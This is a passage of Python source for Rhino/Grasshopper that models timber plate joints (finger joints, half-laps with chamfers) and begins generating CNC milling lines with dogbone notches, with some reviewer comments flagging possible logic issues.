                    pf=rs.CurveClosestPoint(self.FEM_plates[female],location[k])
                    self.FEM_plates[male] = scriptcontext.doc.Objects.Add(self.FEM_plates[male])
                    self.FEM_plates[female] = scriptcontext.doc.Objects.Add(self.FEM_plates[female])
                    joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[male],pm), rs.EvaluateCurve(self.FEM_plates[female],pf))
                    rs.InsertCurveKnot(self.FEM_plates[male],pm)
                    rs.InsertCurveKnot(self.FEM_plates[female],pf)
                    self.FEM_plates[male] = rs.coercecurve(self.FEM_plates[male])
                    self.FEM_plates[female] = rs.coercecurve(self.FEM_plates[female])
                    self.FEM_joints.append(rs.coercecurve(joint_line))
@__skip_nones
def add_fingers(self,
        plates_pairs='all',
        finger_number_1=2.0,
        finger_length_1='default',
        finger_width_1=1.0,
        finger_number_2=2.0,
        finger_length_2='default',
        finger_width_2=1.0,
        finger_spacing=0.0,
        finger_shift=0.0,
        mirror=False):
    """Add finger joints on Side-to-Side contact zones.

    Fingers alternate between the two plates: group 1 belongs to plate i,
    group 2 to plate nb.

    Parameters:
        plates_pairs: 'all' or a list of '(a,b)' pair strings; unlike the
            tenon methods only the (i,nb) order is tested here.
        finger_number_1 / finger_number_2: finger count for each side.
        finger_length_1 / finger_length_2: 'default' (or 0) derives the
            length from the opposite plate thickness and the dihedral
            angle; otherwise used as-is.
        finger_width_1 / finger_width_2: width of one finger per side.
        finger_spacing: extra gap between consecutive fingers.
        finger_shift: lateral offset of the whole pattern.
        mirror: swap the two groups around the joint center (alternate
            configuration only).

    Side effects: appends joint solids to joints_positives/joints_negatives
    of both plates and splices the finger outlines into their contours.
    """
    #cast plate_pairs to string
    if plates_pairs != 'all':
        for i in range(len(plates_pairs)):
            plates_pairs[i] = str(plates_pairs[i])
    #conditional loop over every contact of every plate
    for i in range(self.count):
        types = self.contact_types[i]
        for j in range(len(types)):
            nb = self.contact_ids[i][j]
            #specific selection function
            #NOTE(review): only the (i,nb) order is accepted here, whereas
            #add_tenons/add_sunrise accept both orders — confirm intended.
            if ((plates_pairs == 'all')
                    or ('('+str(i)+','+str(nb)+')' == plates_pairs)
                    or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
                i_want_a_finger = True
            else: i_want_a_finger = False
            #for all specified Side-to-Side connection
            if (types[j] == 'SS') and (nb > i) and (i_want_a_finger is True):
                #prerequisite
                if finger_length_1 < 0 : raise Exception('finger_length_1 must be greater than 0')
                if finger_length_2 < 0 : raise Exception('finger_length_2 must be greater than 0')
                #joint location: check the pattern fits the contact rectangle
                zone = self.contact_zones[i][j]
                rectangle = Toolbox.Curves.trapeze_to_rectangle(rs.JoinCurves(rs.DuplicateEdgeCurves(zone)))
                if Toolbox.Curves.rectangle_dimensions(rectangle)[0] < (finger_width_1*finger_number_1 + finger_width_2*finger_number_2 + 2*finger_spacing*(finger_number_1+finger_number_2-1) + finger_shift*2):
                    excess = (finger_width_1*finger_number_1 + finger_width_2*finger_number_2 + 2*finger_spacing*(finger_number_1+finger_number_2-1) + finger_shift*2) / (Toolbox.Curves.rectangle_dimensions(rectangle)[0]) * 100
                    raise Exception(' Joint is to large ('+ str(int(excess)) +' %) for contact area between plate '+str(i)+' and plate '+str(nb))
                plane_male = self.plates[i].top_plane
                plane_female = self.plates[nb].top_plane
                center = self.contact_centers[i][j]
                joint_plane = rs.PlaneFromNormal(center, self.contact_planes[i][j].YAxis, self.contact_planes[i][j].XAxis)
                #default length 1: opposite plate thickness, corrected by the
                #dihedral angle when the plates are neither parallel nor square
                if (finger_length_1 == 'default') or (finger_length_1 == 0) :
                    if abs(rs.IsVectorParallelTo(plane_male.ZAxis, plane_female.ZAxis)) == 0 and rs.IsVectorPerpendicularTo(plane_male.ZAxis, plane_female.ZAxis) is False:
                        alpha = rs.VectorAngle(plane_male.ZAxis, plane_female.ZAxis)
                        thickness_female = self.plates[nb].thickness
                        new_finger_length_1 = abs(thickness_female / math.sin(math.radians(180-alpha)))
                    else: new_finger_length_1 = self.plates[nb].thickness
                else: new_finger_length_1 = finger_length_1
                #default length 2: same rule with the roles swapped
                if (finger_length_2 == 'default') or (finger_length_2 == 0) :
                    if abs(rs.IsVectorParallelTo(plane_male.ZAxis, plane_female.ZAxis)) == 0 and rs.IsVectorPerpendicularTo(plane_male.ZAxis, plane_female.ZAxis) is False:
                        alpha = rs.VectorAngle(plane_male.ZAxis, plane_female.ZAxis)
                        thickness_male = self.plates[i].thickness
                        new_finger_length_2 = abs(thickness_male / math.sin(math.radians(180-alpha)))
                    else: new_finger_length_2 = self.plates[i].thickness
                else: new_finger_length_2 = finger_length_2
                #correct length projection onto the joint plane
                if abs(rs.IsVectorParallelTo(plane_male.ZAxis, joint_plane.ZAxis)) == 0:
                    beta = rs.VectorAngle(plane_male.ZAxis, joint_plane.ZAxis)
                    new_finger_length_1 = new_finger_length_1 * abs(math.cos(math.radians(beta)))
                if abs(rs.IsVectorParallelTo(plane_female.ZAxis, joint_plane.ZAxis)) == 0:
                    beta = rs.VectorAngle(plane_female.ZAxis, joint_plane.ZAxis)
                    new_finger_length_2 = new_finger_length_2*abs(math.cos(math.radians(beta)))
                #configuration (alternate or centered)
                if (finger_number_1 + finger_number_2) % 2 == 0:
                    #alternate: the two groups are offset either side of center
                    if mirror is False:
                        center_1 = rs.CopyObject(joint_plane.Origin, joint_plane.XAxis * (finger_spacing + finger_width_2) /2)
                        center_2 = rs.CopyObject(joint_plane.Origin, -joint_plane.XAxis * (finger_spacing + finger_width_1) /2)
                    else:
                        center_1 = rs.CopyObject(joint_plane.Origin, -joint_plane.XAxis * (finger_spacing + finger_width_2) /2)
                        center_2 = rs.CopyObject(joint_plane.Origin, joint_plane.XAxis * (finger_spacing + finger_width_1) /2)
                else:
                    #centered: both groups share the joint center
                    center_1 = joint_plane.Origin
                    center_2 = joint_plane.Origin
                #finger location - first side
                if finger_number_1 > 1 :
                    dist = (float(finger_number_1 -1) /2) * (finger_width_1 + finger_width_2 + 2*finger_spacing)
                    pointA = rs.CopyObject(center_1, joint_plane.XAxis * dist)
                    pointB = rs.CopyObject(center_1, -joint_plane.XAxis * dist)
                    line = rs.AddLine(pointA, pointB)
                    shifted_line = rs.CopyObject(line, joint_plane.XAxis * finger_shift)
                    location_1 = rs.DivideCurve(shifted_line, finger_number_1 -1)
                else: location_1 = [rs.CopyObject(center_1, joint_plane.XAxis * finger_shift)]
                #finger location - second side
                if finger_number_2 > 1 :
                    dist = (float(finger_number_2 -1) /2) * (finger_width_1 + finger_width_2 +2*finger_spacing)
                    pointA = rs.CopyObject(center_2, joint_plane.XAxis * dist)
                    pointB = rs.CopyObject(center_2, -joint_plane.XAxis * dist)
                    line = rs.AddLine(pointA, pointB)
                    shifted_line = rs.CopyObject(line, joint_plane.XAxis * finger_shift)
                    location_2 = rs.DivideCurve(shifted_line, finger_number_2 -1)
                else: location_2 = [rs.CopyObject(center_2, joint_plane.XAxis * finger_shift)]
                #solid - first side (fingers of plate nb cutting into plate i)
                for k in range(len(location_2)):
                    #base polyline of one finger
                    point1 = rs.coerce3dpoint(rs.CopyObject(location_2[k], joint_plane.XAxis * finger_width_2/2))
                    point4 = rs.coerce3dpoint(rs.CopyObject(location_2[k], -joint_plane.XAxis * finger_width_2/2))
                    point2 = rs.coerce3dpoint(rs.CopyObject(point1, joint_plane.YAxis * new_finger_length_2))
                    point3 = rs.coerce3dpoint(rs.CopyObject(point4, joint_plane.YAxis * new_finger_length_2))
                    polyline = [point1, point2, point3, point4, point1]
                    #projection for joint negative (onto plate i faces)
                    proj_top_n = rg.Polyline(copy.deepcopy(polyline))
                    proj_top_n.Transform(rg.Transform.ProjectAlong(self.plates[i].top_plane, joint_plane.ZAxis))
                    proj_top_n =proj_top_n.ToArray()
                    proj_bottom_n = rg.Polyline(copy.deepcopy(polyline))
                    proj_bottom_n.Transform(rg.Transform.ProjectAlong(self.plates[i].bottom_plane, joint_plane.ZAxis))
                    proj_bottom_n = proj_bottom_n.ToArray()
                    finger_box_n = box = rg.Brep.CreateFromBox(proj_top_n[0:4] + proj_bottom_n[0:4])
                    self.plates[i].joints_negatives.append(finger_box_n)
                    #projection for joint positive (onto plate nb faces)
                    proj_top_p = rg.Polyline(copy.deepcopy(polyline))
                    proj_top_p.Transform(rg.Transform.ProjectAlong(self.plates[nb].top_plane, joint_plane.ZAxis))
                    proj_top_p =proj_top_p.ToArray()
                    proj_bottom_p = rg.Polyline(copy.deepcopy(polyline))
                    proj_bottom_p.Transform(rg.Transform.ProjectAlong(self.plates[nb].bottom_plane, joint_plane.ZAxis))
                    proj_bottom_p = proj_bottom_p.ToArray()
                    finger_box_p = box = rg.Brep.CreateFromBox(proj_top_p[0:4] + proj_bottom_p[0:4])
                    #if (finger_length_2 == 'default') or (finger_length_2 == 0) :
                    #trim the positive so it does not overshoot plate i
                    top_plane = rs.coerceplane(self.plates[i].top_plane)
                    bottom_plane = rs.coerceplane(self.plates[i].bottom_plane)
                    finger_box_p = Toolbox.Breps.slice_2_planes(finger_box_p, top_plane, bottom_plane)
                    self.plates[nb].joints_positives.append(finger_box_p)
                    # contour: splice the finger outline into both plates
                    top_poly_n = rs.AddPolyline([proj_top_n[0],proj_top_n[1], proj_top_n[2], proj_top_n[3]])
                    bottom_poly_n = rs.AddPolyline([proj_bottom_n[0],proj_bottom_n[1], proj_bottom_n[2], proj_bottom_n[3]])
                    top_poly_p = rs.AddPolyline([proj_top_p[0],proj_top_p[1], proj_top_p[2], proj_top_p[3]])
                    bottom_poly_p = rs.AddPolyline([proj_bottom_p[0],proj_bottom_p[1], proj_bottom_p[2], proj_bottom_p[3]])
                    self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [top_poly_p])
                    self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [bottom_poly_p])
                    self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [top_poly_n])
                    self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [bottom_poly_n])
                #solid - second side (fingers of plate i cutting into plate nb)
                for k in range(len(location_1)):
                    #base polyline of one finger (grown the opposite way)
                    point1 = rs.coerce3dpoint(rs.CopyObject(location_1[k], joint_plane.XAxis * finger_width_1/2))
                    point4 = rs.coerce3dpoint(rs.CopyObject(location_1[k], -joint_plane.XAxis * finger_width_1/2))
                    point2 = rs.coerce3dpoint(rs.CopyObject(point1, -joint_plane.YAxis * new_finger_length_1))
                    point3 = rs.coerce3dpoint(rs.CopyObject(point4, -joint_plane.YAxis * new_finger_length_1))
                    polyline = [point1, point2, point3, point4, point1]
                    #projection for joint negative (onto plate nb faces)
                    proj_top_n = rg.Polyline(copy.deepcopy(polyline))
                    proj_top_n.Transform(rg.Transform.ProjectAlong(self.plates[nb].top_plane, joint_plane.ZAxis))
                    proj_top_n =proj_top_n.ToArray()
                    proj_bottom_n = rg.Polyline(copy.deepcopy(polyline))
                    proj_bottom_n.Transform(rg.Transform.ProjectAlong(self.plates[nb].bottom_plane, joint_plane.ZAxis))
                    proj_bottom_n = proj_bottom_n.ToArray()
                    finger_box_n = box = rg.Brep.CreateFromBox(proj_top_n[0:4] + proj_bottom_n[0:4])
                    self.plates[nb].joints_negatives.append(finger_box_n)
                    #projection for joint positive (onto plate i faces)
                    proj_top_p = rg.Polyline(copy.deepcopy(polyline))
                    proj_top_p.Transform(rg.Transform.ProjectAlong(self.plates[i].top_plane, joint_plane.ZAxis))
                    proj_top_p =proj_top_p.ToArray()
                    proj_bottom_p = rg.Polyline(copy.deepcopy(polyline))
                    proj_bottom_p.Transform(rg.Transform.ProjectAlong(self.plates[i].bottom_plane, joint_plane.ZAxis))
                    proj_bottom_p = proj_bottom_p.ToArray()
                    finger_box_p = box = rg.Brep.CreateFromBox(proj_top_p[0:4] + proj_bottom_p[0:4])
                    #if (finger_length_1 == 'default') or (finger_length_1 == 0) :
                    #trim the positive so it does not overshoot plate nb
                    top_plane = rs.coerceplane(self.plates[nb].top_plane)
                    bottom_plane = rs.coerceplane(self.plates[nb].bottom_plane)
                    finger_box_p = Toolbox.Breps.slice_2_planes(finger_box_p, top_plane, bottom_plane)
                    self.plates[i].joints_positives.append(finger_box_p)
                    # contour: splice the finger outline into both plates
                    top_poly_n = rs.AddPolyline([proj_top_n[0],proj_top_n[1], proj_top_n[2], proj_top_n[3]])
                    bottom_poly_n = rs.AddPolyline([proj_bottom_n[0],proj_bottom_n[1], proj_bottom_n[2], proj_bottom_n[3]])
                    top_poly_p = rs.AddPolyline([proj_top_p[0],proj_top_p[1], proj_top_p[2], proj_top_p[3]])
                    bottom_poly_p = rs.AddPolyline([proj_bottom_p[0],proj_bottom_p[1], proj_bottom_p[2], proj_bottom_p[3]])
                    self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [top_poly_p])
                    self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [bottom_poly_p])
                    self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [top_poly_n])
                    self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [bottom_poly_n])
                # Structural analysis
                # NOTE(review): the FEM update below is mostly disabled — only
                # pm/pf are computed; the rest sits in a no-op string literal.
                for k in range(len(location_1)):
                    pm=rs.CurveClosestPoint(self.FEM_plates[i],location_1[k])
                    pf=rs.CurveClosestPoint(self.FEM_plates[nb],location_1[k])
                    """
                    self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
                    self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
                    joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
                    rs.InsertCurveKnot(self.FEM_plates[i],pm)
                    rs.InsertCurveKnot(self.FEM_plates[nb],pf)
                    self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
                    self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
                    self.FEM_joints.append(rs.coercecurve(joint_line))
                    for k in range(len(location_2)):
                    pm=rs.CurveClosestPoint(self.FEM_plates[i],location_2[k])
                    pf=rs.CurveClosestPoint(self.FEM_plates[nb],location_2[k])
                    self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
                    self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
                    joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
                    rs.InsertCurveKnot(self.FEM_plates[i],pm)
                    rs.InsertCurveKnot(self.FEM_plates[nb],pf)
                    self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
                    self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
                    self.FEM_joints.append(rs.coercecurve(joint_line))
                    """
@__skip_nones
def add_halflap(self,
        plates_pairs='all',
        proportion = 0.5,
        tolerance = 0.0,
        min_angle = 45.0,
        straight_height = 0.0,
        fillet_height = 0.0,
        segments = 1):
    """Add half-lap joints on Intersecting Plates.

    Parameters:
        plates_pairs: 'all' or a list of '(a,b)' pair strings; only the
            (i,nb) order is tested here.
        proportion: where the lap plane splits the shared volume, strictly
            within [0.01, 0.99].
        tolerance: clearance for the chamfered slot; 0 disables chamfering.
        min_angle: slope angle of the chamfer walls, strictly in (0, 90).
        straight_height: straight wall height before the fillet starts.
        fillet_height: height of the fillet blending wall and slope.
        segments: number of polyline segments used to discretize the
            fillet arc (minimum 1).

    Side effects: appends one negative (slot) solid per plate, splices the
    slot outlines into both plates' contours, and adds one FEM joint line.
    """
    #cast plate_pairs to string
    if plates_pairs != 'all':
        for i in range(len(plates_pairs)):
            plates_pairs[i] = str(plates_pairs[i])
    #conditional loop over every contact of every plate
    for i in range(self.count):
        types = self.contact_types[i]
        for j in range(len(types)):
            nb = self.contact_ids[i][j]
            #specific selection function (only the (i,nb) order is tested)
            if ((plates_pairs == 'all')
                    or ('('+str(i)+','+str(nb)+')' == plates_pairs)
                    or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
                i_want_a_halflap = True
            else: i_want_a_halflap = False
            #for all specified Intersecting connection
            if (types[j] == 'IN') and (nb > i) and (i_want_a_halflap is True):
                #prerequisite
                if proportion < 0.01 or proportion > 0.99: raise Exception(' Proportion should remain strictly between 0.01 and 0.99.')
                if tolerance < 0 : raise Exception(' Tolerance should be higher than 0.0.')
                if segments < 1: segments =1
                # Solids: boolean intersection of the two plates, then find
                # the four long edges aligned with the intersection direction
                zone = self.contact_zones[i][j]
                volume = rg.Brep.CreateBooleanIntersection(self.plates[i].brep,self.plates[nb].brep, 0.001)[0]
                edges = Toolbox.Breps.brep_edges(volume)
                edges.sort(key=rs.CurveLength)
                edges.reverse()
                vec_dir = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.cross(self.plates[i].top_normal, self.plates[nb].top_normal)),6)
                four_edges = []
                for edge in edges:
                    vec_line = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.line_to_vec(edge)),6)
                    if vec_dir == vec_line:
                        four_edges.append(edge)
                    elif vec_dir == rs.VectorReverse(vec_line):
                        #reverse so all four edges point the same way
                        rg.Curve.Reverse(edge)
                        four_edges.append(edge)
                    if len(four_edges) == 4: break
                # Mid plane: project the volume center on the four edges
                mids = [rs.CurveMidPoint(four_edges[k]) for k in range(4)]
                center = Toolbox.Points.average_point(mids)
                proj = rs.coerce3dpointlist([rs.EvaluateCurve(four_edges[l],rs.CurveClosestPoint(four_edges[l],center)) for l in range(4)])
                # Proportion parameter: available travel on both sides
                d1 = rs.Distance(rs.CurveStartPoint(four_edges[0]), proj[0])
                d2 = rs.Distance(rs.CurveStartPoint(four_edges[1]), proj[1])
                d3 = rs.Distance(rs.CurveStartPoint(four_edges[2]), proj[2])
                d4 = rs.Distance(rs.CurveStartPoint(four_edges[3]), proj[3])
                min1 = min(d1,d2,d3,d4)
                d5 = rs.Distance(rs.CurveEndPoint(four_edges[0]), proj[0])
                d6 = rs.Distance(rs.CurveEndPoint(four_edges[1]), proj[1])
                d7 = rs.Distance(rs.CurveEndPoint(four_edges[2]), proj[2])
                d8 = rs.Distance(rs.CurveEndPoint(four_edges[3]), proj[3])
                min2 = min(d5,d6,d7,d8)
                #cutting plane outline positioned at `proportion` of the travel
                poly = rs.AddPolyline(rs.PolylineVertices(gh.ConvexHull(proj, rs.PlaneFitFromPoints(proj))[0]))
                vec1 = rs.VectorUnitize(rs.VectorCreate(rs.CurveStartPoint(four_edges[0]), proj[0]))
                polyAt0 = rs.CopyObject(poly, min1*vec1)
                poly = rs.CopyObject(polyAt0, proportion*(min1+min2)*rs.VectorUnitize(-vec1))
                # Cutting volume in pieces
                cutter = rs.coercebrep(rs.AddPlanarSrf(poly))
                pieces = rs.SplitBrep(volume, cutter)
                # NOTE(review): rebinding the loop variable discards the
                # CapPlanarHoles result — confirm capping still takes effect.
                for piece in pieces: piece = rs.CapPlanarHoles(piece)
                #order pieces so pieces[0] belongs to plate i, pieces[1] to nb
                int_i = rs.CurveBrepIntersect(self.plates[i].top_contour, pieces[0])
                int_nb = rs.CurveBrepIntersect(self.plates[nb].top_contour, pieces[0])
                if int_i != None:
                    if int_nb != None:
                        if rs.CurveLength(int_i[0]) < rs.CurveLength(int_nb[0]):
                            pieces.reverse()
                    else: pieces.reverse()
                # Fabrication lines: slot outline on each face of each plate
                piece_i_top = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[0], self.plates[i].top_face)[0], self.plates[i].top_contour)
                piece_i_bottom = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[0], self.plates[i].bottom_face)[0], self.plates[i].bottom_contour)
                piece_nb_top = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[1], self.plates[nb].top_face)[0], self.plates[nb].top_contour)
                piece_nb_bottom = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[1], self.plates[nb].bottom_face)[0], self.plates[nb].bottom_contour)
                # Chamfer: replace the straight slot walls by sloped/filleted ones
                if tolerance != 0:
                    if not 0 < min_angle < 90 : raise Exception(' The angle of the slope should remain strictly between 0 and 90.')
                    radius = fillet_height/math.sin(math.radians(90-min_angle))
                    fillet_width = radius - math.sqrt((radius*radius)-(fillet_height*fillet_height))
                    if fillet_width > tolerance: raise Exception(' Fillet height is to big according to the tolerance you specified.')
                    #polyline vertices without chamfer
                    pv_i_top = rs.CullDuplicatePoints(rs.PolylineVertices(piece_i_top),0.01)
                    pv_i_bottom = rs.CullDuplicatePoints(rs.PolylineVertices(piece_i_bottom),0.01)
                    pv_nb_top = rs.CullDuplicatePoints(rs.PolylineVertices(piece_nb_top),0.01)
                    pv_nb_bottom = rs.CullDuplicatePoints(rs.PolylineVertices(piece_nb_bottom),0.01)
                    #chamfer planes: one per slot wall, two per face outline
                    chamfer_planes = []
                    chamfer_planes.append(rs.PlaneFromPoints(pv_i_top[1],pv_i_top[2],pv_i_top[0]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_i_top[2],pv_i_top[1],pv_i_top[3]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_i_bottom[2],pv_i_bottom[1],pv_i_bottom[3]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_i_bottom[1],pv_i_bottom[2],pv_i_bottom[0]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_nb_top[1],pv_nb_top[2],pv_nb_top[0]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_nb_top[2],pv_nb_top[1],pv_nb_top[3]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_nb_bottom[2],pv_nb_bottom[1],pv_nb_bottom[3]))
                    chamfer_planes.append(rs.PlaneFromPoints(pv_nb_bottom[1],pv_nb_bottom[2],pv_nb_bottom[0]))
                    contours = [self.plates[i].top_contour, self.plates[i].bottom_contour, self.plates[nb].top_contour, self.plates[nb].bottom_contour]
                    #chamfer geometry
                    chamfer_sides = []
                    chamfer_faces = []
                    int_contour = []
                    for k in range(len(chamfer_planes)):
                        cp = chamfer_planes[k]
                        #new joint polyline: wall -> fillet -> slope -> overshoot
                        point_A = cp.Origin #origin
                        point_B = rs.CopyObject(point_A, straight_height * cp.YAxis) #before fillet
                        point_C = rs.CopyObject(point_B, rs.VectorAdd(fillet_height * cp.YAxis, -fillet_width * cp.XAxis)) #after fillet
                        point_D = rs.CopyObject(point_C, rs.VectorAdd( (tolerance - fillet_width) * math.tan(math.radians(min_angle)) * cp.YAxis, -(tolerance - fillet_width) * cp.XAxis))
                        point_E = rs.CopyObject(point_D, 100*cp.YAxis) #large overshoot to guarantee the cut
                        chamfer_side = [point_A]
                        if fillet_height > 0:
                            #replace the B-C corner by a discretized fillet arc
                            fillet = Toolbox.Curves.fillet_curves(rs.AddLine(point_A,point_B), rs.AddLine(point_C,point_D), radius, False)
                            discreet = rs.DivideCurve(fillet, segments)
                            for point in discreet:
                                chamfer_side.append(point)
                        else:
                            chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_C)))
                        chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_D)))
                        chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_E)))
                        chamfer_sides.append(rs.AddPolyline(chamfer_side))
                        #new joint brep: pair each wall with its opposite side
                        if k%2 == 1:
                            chamfer_faces.append(Toolbox.Curves.connect_curves(chamfer_sides[k-1],chamfer_sides[k]))
                    chamfer_brep_1 = Toolbox.Breps.brep_from_2_poly(chamfer_faces[0], chamfer_faces[1])
                    chamfer_brep_2 = Toolbox.Breps.brep_from_2_poly(chamfer_faces[2], chamfer_faces[3])
                    pieces[0] = chamfer_brep_1
                    pieces[1] = chamfer_brep_2
                    #chamfer contour: rebuild the fabrication outlines
                    to_insert=[]
                    for k in range(len(contours)):
                        c1 = Toolbox.Curves.trim_curve_with_curve(rs.coercecurve(chamfer_sides[2*k]), contours[k])
                        c2 = Toolbox.Curves.trim_curve_with_curve(rs.coercecurve(chamfer_sides[2*k+1]), contours[k])
                        line = rs.AddLine(rs.CurveStartPoint(c1),rs.CurveStartPoint(c2))
                        to_insert.append(rs.coercecurve(rs.JoinCurves([c1, line, c2])))
                    piece_i_top, piece_i_bottom, piece_nb_top, piece_nb_bottom = to_insert[0], to_insert[1], to_insert[2], to_insert[3]
                #append final attributes
                self.plates[i].joints_negatives.append(pieces[0])
                self.plates[nb].joints_negatives.append(pieces[1])
                self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [piece_i_top])
                self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [piece_i_bottom])
                self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [piece_nb_top])
                self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [piece_nb_bottom])
                #Structural analysis: one FEM joint line at the lap center,
                #round-tripping the curves through the document to add knots
                pm=rs.CurveClosestPoint(self.FEM_plates[i],center)
                pf=rs.CurveClosestPoint(self.FEM_plates[nb],center)
                self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
                self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
                joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
                rs.InsertCurveKnot(self.FEM_plates[i],pm)
                rs.InsertCurveKnot(self.FEM_plates[nb],pf)
                self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
                self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
                self.FEM_joints.append(rs.coercecurve(joint_line))
# Operations ----------------------------------
@__skip_nones
def get_fabrication_lines(self,
    plates='all',
    contour_tool_radius = 1.0,
    holes_tool_radius = 1.0,
    notch=False,
    cylinder=False,
    limit = 1,
    tbone = False):
    """Generate the CNC milling polylines for each plate.

    The top/bottom contours are offset outward by contour_tool_radius and
    each pair of holes is offset inward by holes_tool_radius. With
    notch=True, corners sharper than `limit` degrees receive dogbone
    (or T-bone when tbone=True) notches; with cylinder=True as well, the
    matching tool cylinders/blocks are stored in joints_negatives for a
    later boolean difference.

    Parameters:
        plates: 'all', None, or a list of plate indices given as strings.
        contour_tool_radius: tool radius for the outer contour offset.
        holes_tool_radius: tool radius for the hole offsets.
        notch: insert corner notches so the round tool can reach corners.
        cylinder: also build the notch solids as boolean negatives.
        limit: corner angle (degrees) under which no notch is created.
        tbone: use T-bone notches instead of dogbone notches.

    Fix: the extra notch block of the hole offsets previously built its
    construction disk with contour_tool_radius; it now consistently uses
    the hole tool radius.
    """
    def _add_notch_solids(plate, top_spikes, bottom_spikes, tool_radius, factor_mult):
        # For every notch spike pair, build the milling-tool cylinder (and,
        # when the spike is longer than the tool radius, an extra block)
        # and store them as boolean negatives on the plate.
        if top_spikes is None:
            return
        for k in range(len(top_spikes)):
            # cylinder end points on the top and bottom offset curves
            top_point = rs.CurveEndPoint(top_spikes[k])
            bottom_point = rs.CurveEndPoint(bottom_spikes[k])
            # cylinder axis, lengthened to account for the tool inclination
            path = rs.AddLine(top_point, bottom_point)
            path_center = Toolbox.Points.average_point([top_point, bottom_point])
            path_length = rs.Distance(top_point, bottom_point)
            axis = Toolbox.Vectors.line_to_vec(path)
            axis_angle = rs.VectorAngle(axis, plate.top_plane.ZAxis)
            factor = factor_mult * (path_length + 2*tool_radius*abs(math.tan(math.radians(axis_angle))))/path_length
            scaled_path = rs.ScaleObject(path, path_center, [factor, factor, factor], True)
            cylinder_plane = rs.PlaneFromNormal(rs.CurveStartPoint(scaled_path), axis)
            # create cylinder on notches for optional boolean operation
            circle = rs.AddCircle(cylinder_plane, tool_radius)
            cyl = rs.ExtrudeCurve(circle, scaled_path)
            rs.CapPlanarHoles(cyl)
            plate.joints_negatives.append(rs.coercebrep(cyl))
            # additional notch block for spikes longer than the tool radius
            if rs.CurveLength(top_spikes[k]) > tool_radius:
                disk = rs.AddPlanarSrf(rs.AddCircle(cylinder_plane, 10*(rs.CurveLength(top_spikes[k])+2*tool_radius)))
                inclination = rs.VectorCreate(rs.CurveEndPoint(path), rs.CurveStartPoint(path))
                proj = rs.ProjectCurveToSurface(top_spikes[k], disk, inclination)
                rot = rs.RotateObject(proj, cylinder_plane.Origin, 90, cylinder_plane.ZAxis)
                move_vector = rs.VectorCreate(cylinder_plane.Origin, rs.CurveMidPoint(rot))
                mov = rs.MoveObject(rot, move_vector)
                sca = rs.ScaleObject(mov, cylinder_plane.Origin, [10, 10, 10], True)
                inters = rs.CurveCurveIntersection(circle, sca)
                p1 = inters[0][1]
                p2 = inters[1][1]
                spike_plane = rs.PlaneFromNormal(top_point, plate.top_plane.ZAxis)
                # bug fix: use this section's tool radius (was contour_tool_radius
                # even when called for holes)
                disk2 = rs.AddPlanarSrf(rs.AddCircle(spike_plane, 10*(rs.CurveLength(top_spikes[k])+2*tool_radius)))
                para = rs.ProjectPointToSurface([p1, p2], disk2, inclination)
                para2 = rs.CopyObjects(para, rs.VectorCreate(rs.CurveStartPoint(top_spikes[k]), rs.CurveEndPoint(top_spikes[k])))
                parallelo = rs.AddPolyline([para[0], para[1], para2[1], para2[0], para[0]])
                path = rs.ScaleObject(path, rs.CurveMidPoint(path), [1.01, 1.01, 1.01])
                paralleli = rs.ExtrudeCurve(parallelo, path)
                rs.CapPlanarHoles(paralleli)
                plate.joints_negatives.append(rs.coercebrep(paralleli))
    for i in range(self.count):
        # apply to all or some plates.
        flag = True
        if (plates != None) and (plates != 'all'):
            flag = False
            for j in range(len(plates)):
